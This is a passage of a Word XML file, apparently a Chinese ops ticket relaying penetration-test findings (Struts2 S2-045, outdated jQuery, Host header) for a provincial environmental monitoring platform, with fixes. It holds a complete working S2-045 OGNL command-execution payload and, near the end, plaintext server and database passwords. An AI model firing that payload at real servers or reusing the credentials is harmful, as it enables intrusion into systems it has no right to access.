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04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04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-637118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山西省环境监控中心监控平台系统第三方运维国发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运行维护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TCS180903002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01-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等保测评中漏扫及渗透报告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保测评对山西省厅监控中心服务器进行检查，检查出国发平台的相应漏洞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罗克佳华给了一个等保测评的漏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渗透报告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档，其中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是国发软件的问题，现在需要咱们解决，具体问题如下：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="412" w:before="240" w:after="60"/>
              <w:ind w:left="709" w:right="105" w:hanging="709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pache Struts2 S2-045 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>远程代码执行漏洞（</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>CVE-2017-5638</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>高危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6812"/>
            </w:tblGrid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请求方式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GE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URL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://192.168.120.99:8080/jointframe/console/ConsoleLogin!index.page?loginError=auth_failed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问题参数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Content-Typ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参考（验证）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://192.168.120.99:8080/jointframe/console/ConsoleLogin!index.page?loginError=auth_failed(CONTENT-TYPE)${(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo mzoeikknutwbxhgylivqopnqatbclxlxcyhgumfnrdsikvxndmobpcfyqezk').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}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6812"/>
            </w:tblGrid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详细描述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Struts2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是第二代基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Model-View-Controller (MVC)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模型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web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应用框架。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jav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企业级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web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应用的可扩展性的框架。它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WebWork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社区合并后的产物。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br/>
                    <w:t xml:space="preserve"> </w:t>
                    <w:br/>
                    <w:t>Struts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在使用基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Jakart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插件的文件上传功能时可能存在远程命令执行，攻击者可在上传文件时通过修改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请求头中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Content-Typ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值来触发该漏洞，进而执行系统命令导致系统被入侵。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br/>
                    <w:t xml:space="preserve"> </w:t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影响版本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 2.3.5-Struts 2.3.3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Struts 2.5-Struts 2.5.10 </w:t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安全版本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 2.3.3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 2.5.10.1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解决办法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、如您正在使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Jakart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文件上传插件或者是存在漏洞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 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版本请升级至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truts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安全版本。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br/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、使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ervle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过滤器验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Content-Typ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丢弃不匹配的请求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multipart/form-dat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。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威胁分值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危险插件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否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发现日期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2017-03-07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CVE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编号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CVE-2017-5638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CVSS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评分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7.3(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A: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40" w:before="240" w:after="60"/>
              <w:ind w:left="567" w:right="105" w:hanging="567"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>应用漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="412" w:before="240" w:after="60"/>
              <w:ind w:left="709" w:right="105" w:hanging="709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检测到目标站点存在</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>javascript</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>框架库漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>中危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6812"/>
            </w:tblGrid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请求方式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GE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URL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://192.168.120.99:8080/jointframe/static/script/jquery.js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问题参数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24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参考（验证）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jquery:1.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6812"/>
            </w:tblGrid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详细描述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JavaScript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框架或库是一组能轻松生成跨浏览器兼容的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JavaScript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代码的工具和函数。如果网站使用了存在漏洞的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JavaScript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框架或库，攻击者就可以利用此漏洞来劫持用户浏览器，进行挂马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XSS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Cooki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劫持等攻击。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解决办法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将受影响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javascrip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框架库升级到最新版本。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威胁分值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危险插件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否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发现日期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2001-01-01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CVSS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评分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6.1(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="412" w:before="240" w:after="60"/>
              <w:ind w:left="709" w:right="105" w:hanging="709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检测到目标</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>存在</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>http host</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>头攻击漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>中危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6812"/>
            </w:tblGrid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请求方式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GE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URL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://192.168.120.99:8080/jointframe/app/sso/login?service=http://192.168.120.99:8080/jointframe/app/sso/j_sso_spring_security_check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问题参数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ost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参考（验证）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://192.168.120.99:8080/jointframe/app/sso/login?service=http://192.168.120.99:8080/jointframe/app/sso/j_sso_spring_security_check(HOST)www.zqculh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6812"/>
            </w:tblGrid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详细描述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为了方便的获得网站域名，开发人员一般依赖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TTP Host head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。例如，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ph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里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_SERVER["HTTP_HOST"]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。但是这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ead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是不可信赖的，如果应用程序没有对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ost head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值进行处理，就有可能造成恶意代码的传入。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解决办法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web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应用程序应该使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ERVER_NAM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而不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ost head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 xml:space="preserve">。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Apach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Nginx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里可以通过设置一个虚拟机来记录所有的非法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host header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。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Nginx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里还可以通过指定一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ERVER_NAM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名单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Apach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也可以通过指定一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SERVER_NAM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名单并开启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UseCanonicalNam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选项。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威胁分值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危险插件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lang w:eastAsia="en-US" w:bidi="en-US"/>
                    </w:rPr>
                    <w:t>否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发现日期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2008-06-12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DCEBF0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kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:bidi="en-US"/>
                    </w:rPr>
                    <w:t>CVSS</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:bidi="en-US"/>
                    </w:rPr>
                    <w:t>评分</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6812" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
                    <w:left w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
                    <w:right w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
                  </w:tcBorders>
                  <w:shd w:fill="EAF5F9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eastAsia="微软雅黑"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:eastAsia="en-US" w:bidi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lang w:eastAsia="en-US" w:bidi="en-US"/>
                    </w:rPr>
                    <w:t>6.1(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)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远程方式：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>山西省厅应用服务器：</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>10.14.1.22:3650  administrator/sxhbt_2009</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>山西省厅数据库服务器：</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>10.14.1.23:3650   administrator/sxhbt_2009  sa/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XHBT_admin!@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http://192.168.120.99:8080/jointframe/app/AppMain!index.p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msl/1111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19-04-28T02:37:00Z</dcterms:modified>
  <cp:revision>3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